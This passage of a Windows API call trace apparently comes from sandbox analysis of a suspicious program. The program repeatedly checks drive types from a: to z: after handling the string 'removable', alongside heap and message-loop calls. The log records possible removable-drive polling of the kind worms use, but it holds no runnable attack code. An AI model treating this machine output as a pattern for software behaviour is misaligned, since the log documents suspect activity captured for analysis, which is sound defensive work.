| out: hHeap=0x12c0000) returned 1 [0213.505] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.506] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.506] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0213.506] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.506] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.506] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.507] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.507] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.507] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.507] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.507] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.507] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.507] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.508] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.508] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.508] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.508] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.508] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.508] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.509] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.509] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.509] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.509] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.509] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.510] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.510] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.510] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.510] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.510] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.511] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.511] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.511] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.511] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.511] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.512] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.512] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.512] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.512] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.512] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.512] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.512] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.512] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.512] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.512] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.512] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.513] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.513] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.513] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.513] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.513] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.514] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.514] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.514] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.514] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.514] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.515] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.515] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.515] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.515] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.516] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.516] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.516] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.516] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.516] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.516] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.517] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.517] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.517] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.517] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.517] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.517] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.518] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.518] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.518] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.518] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.518] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.518] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.518] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.518] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.518] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.519] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.519] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.519] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.519] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.519] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.520] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.520] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.521] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.521] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.521] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.521] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.521] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.521] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.522] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.522] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.522] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.522] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.522] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.523] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.523] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.524] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.524] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.524] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.524] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.524] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.524] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.524] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.524] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.524] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.524] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.525] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.525] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.525] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.525] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.525] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.526] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.526] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.526] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.526] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.527] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.527] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.527] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.527] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.527] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.528] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.528] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.528] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.528] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.528] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.529] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.529] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.529] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.529] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.530] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.530] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.530] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.530] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.531] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.531] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.531] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.531] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.531] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.531] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.531] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.531] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.531] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.531] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.531] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.531] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.531] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.532] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.532] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.532] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.532] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.532] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.532] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.532] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.533] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.533] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.533] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.533] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.534] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.534] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.534] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.534] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.534] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.534] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.535] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.535] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.535] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.535] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.535] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.536] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.536] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.536] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.536] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.536] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.536] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.536] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.536] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.608] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.608] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.608] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.608] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.608] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.608] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.609] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.609] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.609] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.609] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.609] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.609] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.609] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.610] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.610] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.610] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.610] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.610] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.610] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.611] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.611] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.611] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.611] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.611] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.612] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.612] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0213.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0213.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0213.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.612] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.612] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.612] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0213.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0213.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.613] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0213.613] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0213.613] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.613] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.613] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.613] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.614] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.614] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.614] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.614] 